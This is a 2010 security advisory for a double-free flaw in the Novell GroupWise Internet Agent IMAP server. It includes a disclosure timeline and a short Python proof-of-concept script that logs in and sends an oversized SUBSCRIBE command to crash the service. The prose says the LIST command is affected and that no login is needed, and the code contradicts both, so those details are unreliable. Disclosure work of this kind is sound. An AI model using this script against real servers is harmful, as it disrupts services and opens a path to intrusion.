98 lines
No EOL
2.8 KiB
Text
98 lines
No EOL
2.8 KiB
Text
#####################################################################################
|
|
|
|
Application: {PRL} Novell Groupwise Internet Agent IMAP LIST Command Remote Code Execution Vulnerability
|
|
Platforms: Linux
|
|
|
|
Exploitation: Remote code execution
|
|
|
|
CVE Number: Pending
|
|
|
|
Novell TID: 7007151
|
|
|
|
ZeroDayInitiative: ZDI-10-242
|
|
|
|
Author: Francis Provencher (Protek Research Lab's)
|
|
|
|
Blog: http://www.protekresearchlab.com/
|
|
|
|
#####################################################################################
|
|
|
|
1) Introduction
|
|
2) Report Timeline
|
|
3) Technical details
|
|
4) The Code
|
|
|
|
|
|
#####################################################################################
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
|
|
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The
|
|
company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell
|
|
NetWare; identity, security, and systems management solutions; and collaboration solutions,
|
|
such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a
|
|
focus for technology and software development. Novell technology contributed to the emergence
|
|
of local area networks, which displaced the dominant mainframe computing model and changed
|
|
computing worldwide. Today, a primary focus of the company is on developing open source software
|
|
for enterprise clients.
|
|
|
|
(http://en.wikipedia.org/wiki/Novell)
|
|
|
|
#####################################################################################
|
|
|
|
============================
|
|
2) Report Timeline
|
|
============================
|
|
|
|
2010-07-20 Vendor Contact by Tippingpoint
|
|
2010-11-08 Vendor release advisory
|
|
|
|
|
|
#####################################################################################
|
|
|
|
============================
|
|
3) Technical details
|
|
============================
|
|
|
|
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
|
|
of Novell Groupwise Internet Agent. Authentication is not required to exploit this vulnerability.
|
|
|
|
The flaw exists within the IMAP server component which listens by default on TCP port 143. When
|
|
handling an IMAP LIST command with a large parameter the process attempts to free the same memory
|
|
twice. A remote attacker can exploit this vulnerability to execute arbitrary code under the
|
|
context of the IMAP server.
|
|
|
|
#####################################################################################
|
|
|
|
===========
|
|
4) The Code
|
|
===========
|
|
|
|
|
|
#!/usr/bin/python
|
|
#
|
|
# Francis Provencher
|
|
# Protek Research Lab.
|
|
#
|
|
#
|
|
|
|
|
|
import socket
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
buffer = '\x41' * 56000
|
|
|
|
s.connect(('192.168.100.177',143))
|
|
s.recv(1024)
|
|
s.send('A001 LOGIN test test \r\n')
|
|
s.recv(1024)
|
|
s.send('A001 SUBSCRIBE ' + buffer + '\r\n')
|
|
s.recv(1024)
|
|
s.close()
|
|
|
|
|
|
#####################################################################################
|
|
(PRL-2010-07) |